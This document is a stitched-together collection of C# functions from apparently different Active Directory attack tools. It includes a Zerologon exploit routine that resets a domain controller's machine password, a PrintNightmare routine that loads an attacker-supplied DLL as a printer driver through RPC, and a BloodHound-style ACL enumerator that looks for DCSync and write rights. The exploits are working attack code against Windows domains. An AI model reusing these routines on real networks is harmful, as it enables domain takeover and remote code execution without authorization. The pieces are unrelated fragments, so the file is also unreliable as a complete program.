public static bool RunZerologon(string mode, string target, string machineaccount, int auth, bool nullsession)
{
bool success = false;
Console.Write("[*] ");
rpcConn = DCSync.CreateBinding(target, null, auth, nullsession: nullsession);
if (rpcConn == IntPtr.Zero)
{
Console.WriteLine("Error CreateBinding");
return(false);
}
NTSTATUS rpcStatus = (NTSTATUS)RpcEpResolveBinding(rpcConn, GetClientInterface());
if (rpcStatus != NTSTATUS.Success)
{
Console.WriteLine("[x] Error RpcEpResolveBinding {0}", (int)rpcStatus);
return(false);
}
for (int i = 0; i < MAX_ATTEMPTS; i++)
{
success = Tryzerologonenticate(machineaccount);
if (success == false)
{
Console.Write("=");
}
else
{
Console.WriteLine("[*]");
Console.WriteLine("[*] Authentication: Ok target vulnerable");
if (!mode.Equals("check"))
{
NTSTATUS status = ChangeDCPassword(machineaccount);
if (status == NTSTATUS.Success)
{
Console.WriteLine("[*] Set password: Ok");
return(true);
}
}
else
{
return(true);
}
break;
}
}
return(false);
}
public static bool RunPrintNightmare(string target, string exploit_path, string authuser, string authdomain, string authpassword, int auth = DCSync.RPC_C_AUTHN_GSS_NEGOTIATE, string altservice = "host")
{
Console.WriteLine("[*] ");
rpcConn = DCSync.CreateBinding(target, altservice, auth, authuser, authdomain, authpassword, impersonationType: DCSync.RPC_C_IMP_LEVEL_DELEGATE);
if (rpcConn == IntPtr.Zero)
{
Console.WriteLine("Error CreateBinding");
return(false);
}
NTSTATUS rpcStatus = (NTSTATUS)RpcEpResolveBinding(rpcConn, GetClientInterface());
if (rpcStatus != NTSTATUS.Success)
{
Console.WriteLine("[x] Error RpcEpResolveBinding {0}", (int)rpcStatus);
return(false);
}
rpcStatus = (NTSTATUS)RpcBindingSetObject(rpcConn, ref PAR_ObjectUUID);
if (rpcStatus != NTSTATUS.Success)
{
Console.WriteLine("[x] Error RpcBindingSetOption {0}", (int)rpcStatus);
return(false);
}
string driverpath = FindDriverPath(rpcConn);
driverpath += "\\unidrv.dll";
Console.WriteLine("[*] DriverPath: {0}", driverpath);
string environment = "Windows x64";
DRIVER_INFO_2 dvi2 = new DRIVER_INFO_2
{
cVersion = 3,
pDataFile = exploit_path,
pEnvironment = environment,
pDriverPath = driverpath,
pName = RandomString(10)
};
if (AddPrinterDriver(dvi2, rpcConn, "C:\\Windows\\System32\\kernelbase.dll"))
{
dvi2.pName = RandomString(10);
string[] p = exploit_path.Split('\\');
if (AddPrinterDriver(dvi2, rpcConn, p[p.Length - 1]))
{
Console.WriteLine();
return(true);
}
}
return(false);
}
Task StartConsumer(BlockingCollection <DBObject> input, BlockingCollection <ACLInfo> output, TaskFactory factory)
{
return(factory.StartNew(() =>
{
foreach (DBObject obj in input.GetConsumingEnumerable())
{
Interlocked.Increment(ref count);
if (obj.NTSecurityDescriptor == null)
{
options.WriteVerbose($"DACL was null on ${obj.SAMAccountName}");
continue;
}
RawSecurityDescriptor desc = new RawSecurityDescriptor(obj.NTSecurityDescriptor, 0);
RawAcl acls = desc.DiscretionaryAcl;
//Figure out whose the owner
string ownersid = desc.Owner.ToString();
if (!manager.FindBySID(ownersid, CurrentDomain, out DBObject owner))
{
if (MappedPrincipal.GetCommon(ownersid, out MappedPrincipal mapped))
{
owner = new DBObject
{
BloodHoundDisplayName = $"{mapped.SimpleName}@{CurrentDomain}",
Type = "group",
Domain = CurrentDomain,
DistinguishedName = $"{mapped.SimpleName}@{CurrentDomain}",
};
}
else if (NullSIDS.TryGetValue(ownersid, out byte val))
{
owner = null;
continue;
}
else
{
try
{
DirectoryEntry entry = new DirectoryEntry($"LDAP://<SID={ownersid}>");
owner = entry.ConvertToDB();
manager.InsertRecord(owner);
}
catch
{
owner = null;
NullSIDS.TryAdd(ownersid, new byte());
options.WriteVerbose($"Unable to resolve {ownersid} for object owner");
continue;
}
}
}
if (owner != null)
{
output.Add(new ACLInfo
{
ObjectName = obj.BloodHoundDisplayName,
ObjectType = obj.Type,
Inherited = false,
RightName = "Owner",
PrincipalName = owner.BloodHoundDisplayName,
PrincipalType = owner.Type,
AceType = "",
Qualifier = "AccessAllowed"
});
}
foreach (QualifiedAce r in acls)
{
string PrincipalSID = r.SecurityIdentifier.ToString();
//Try to map our SID to the principal using a few different methods
if (!manager.FindBySID(PrincipalSID, CurrentDomain, out DBObject principal))
{
if (MappedPrincipal.GetCommon(PrincipalSID, out MappedPrincipal mapped))
{
principal = new DBObject
{
BloodHoundDisplayName = $"{mapped.SimpleName}@{CurrentDomain}",
Type = "group",
Domain = CurrentDomain,
DistinguishedName = $"{mapped.SimpleName}@{CurrentDomain}"
};
}
else if (NullSIDS.TryGetValue(ownersid, out byte val))
{
continue;
}
else
{
try
{
DirectoryEntry entry = new DirectoryEntry($"LDAP://<SID={PrincipalSID}>");
principal = entry.ConvertToDB();
manager.InsertRecord(principal);
}
catch
{
NullSIDS.TryAdd(PrincipalSID, new byte());
options.WriteVerbose($"Unable to resolve {PrincipalSID} for ACL");
continue;
}
}
}
//If we're here, we have a principal. Yay!
//Resolve the ActiveDirectoryRight
ActiveDirectoryRights right = (ActiveDirectoryRights)Enum.ToObject(typeof(ActiveDirectoryRights), r.AccessMask);
string rs = right.ToString();
string guid = r is ObjectAce ? ((ObjectAce)r).ObjectAceType.ToString() : "";
List <string> foundrights = new List <string>();
bool cont = false;
//Figure out if we need more processing
cont |= (rs.Contains("WriteDacl") || rs.Contains("WriteOwner"));
if (rs.Contains("GenericWrite") || rs.Contains("GenericAll"))
{
cont |= ("00000000-0000-0000-0000-000000000000".Equals(guid) || guid.Equals("") || cont);
}
if (rs.Contains("ExtendedRight"))
{
cont |= (guid.Equals("00000000-0000-0000-0000-000000000000") || guid.Equals("") || guid.Equals("00299570-246d-11d0-a768-00aa006e0529") || cont);
//DCSync
cont |= (guid.Equals("1131f6aa-9c07-11d1-f79f-00c04fc2dcd2") || guid.Equals("1131f6ad-9c07-11d1-f79f-00c04fc2dcd2") || cont);
}
if (rs.Contains("WriteProperty"))
{
cont |= (guid.Equals("00000000-0000-0000-0000-000000000000") || guid.Equals("bf9679c0-0de6-11d0-a285-00aa003049e2") || guid.Equals("bf9679a8-0de6-11d0-a285-00aa003049e2") || cont);
}
if (!cont)
{
continue;
}
string acetype = null;
MatchCollection coll = GenericRegex.Matches(rs);
if (rs.Contains("ExtendedRight"))
{
switch (guid)
{
case "1131f6aa-9c07-11d1-f79f-00c04fc2dcd2":
acetype = "DS-Replication-Get-Changes";
break;
case "1131f6ad-9c07-11d1-f79f-00c04fc2dcd2":
acetype = "DS-Replication-Get-Changes-All";
break;
default:
acetype = "All";
break;
}
}
if (acetype != null && (acetype.Equals("DS-Replication-Get-Changes-All") || acetype.Equals("DS-Replication-Get-Changes")))
{
if (!syncers.TryGetValue(principal.DistinguishedName, out DCSync SyncObject))
{
SyncObject = new DCSync
{
Domain = obj.BloodHoundDisplayName,
PrincipalName = principal.BloodHoundDisplayName,
PrincipalType = principal.Type
};
}
if (acetype.Contains("-All"))
{
SyncObject.GetChangesAll = true;
}
else
{
SyncObject.GetChanges = true;
}
syncers.AddOrUpdate(principal.DistinguishedName, SyncObject, (key, oldVar) => SyncObject);
//We only care about these privs if we have both, so store that stuff and continue on
continue;
}
if (rs.Contains("GenericAll"))
{
output.Add(new ACLInfo
{
ObjectName = obj.BloodHoundDisplayName,
ObjectType = obj.Type,
AceType = "",
Inherited = r.IsInherited,
PrincipalName = principal.BloodHoundDisplayName,
PrincipalType = principal.Type,
Qualifier = r.AceQualifier.ToString(),
RightName = "GenericAll"
});
}
if (rs.Contains("GenericWrite"))
{
output.Add(new ACLInfo
{
ObjectName = obj.BloodHoundDisplayName,
ObjectType = obj.Type,
AceType = "",
Inherited = r.IsInherited,
PrincipalName = principal.BloodHoundDisplayName,
PrincipalType = principal.Type,
Qualifier = r.AceQualifier.ToString(),
RightName = "GenericWrite"
});
}
if (rs.Contains("WriteOwner"))
{
output.Add(new ACLInfo
{
ObjectName = obj.BloodHoundDisplayName,
ObjectType = obj.Type,
AceType = "",
Inherited = r.IsInherited,
PrincipalName = principal.BloodHoundDisplayName,
PrincipalType = principal.Type,
Qualifier = r.AceQualifier.ToString(),
RightName = "WriteOwner"
});
}
if (rs.Contains("WriteDacl"))
{
output.Add(new ACLInfo
{
ObjectName = obj.BloodHoundDisplayName,
ObjectType = obj.Type,
AceType = "",
Inherited = r.IsInherited,
PrincipalName = principal.BloodHoundDisplayName,
PrincipalType = principal.Type,
Qualifier = r.AceQualifier.ToString(),
RightName = "WriteDacl"
});
}
if (rs.Contains("WriteProperty"))
{
if (guid.Equals("bf9679c0-0de6-11d0-a285-00aa003049e2"))
{
output.Add(new ACLInfo
{
ObjectName = obj.BloodHoundDisplayName,
ObjectType = obj.Type,
AceType = "Member",
Inherited = r.IsInherited,
PrincipalName = principal.BloodHoundDisplayName,
PrincipalType = principal.Type,
Qualifier = r.AceQualifier.ToString(),
RightName = "WriteProperty"
});
}
else
{
output.Add(new ACLInfo
{
ObjectName = obj.BloodHoundDisplayName,
ObjectType = obj.Type,
AceType = "Script-Path",
Inherited = r.IsInherited,
PrincipalName = principal.BloodHoundDisplayName,
PrincipalType = principal.Type,
Qualifier = r.AceQualifier.ToString(),
RightName = "WriteProperty"
});
}
}
if (rs.Contains("ExtendedRight"))
{
if (guid.Equals("00299570-246d-11d0-a768-00aa006e0529"))
{
output.Add(new ACLInfo
{
ObjectName = obj.BloodHoundDisplayName,
ObjectType = obj.Type,
AceType = "User-Force-Change-Password",
Inherited = r.IsInherited,
PrincipalName = principal.BloodHoundDisplayName,
PrincipalType = principal.Type,
Qualifier = r.AceQualifier.ToString(),
RightName = "ExtendedRight"
});
}
else
{
output.Add(new ACLInfo
{
ObjectName = obj.BloodHoundDisplayName,
ObjectType = obj.Type,
AceType = "All",
Inherited = r.IsInherited,
PrincipalName = principal.BloodHoundDisplayName,
PrincipalType = principal.Type,
Qualifier = r.AceQualifier.ToString(),
RightName = "ExtendedRight"
});
}
}
}
}
}));
}
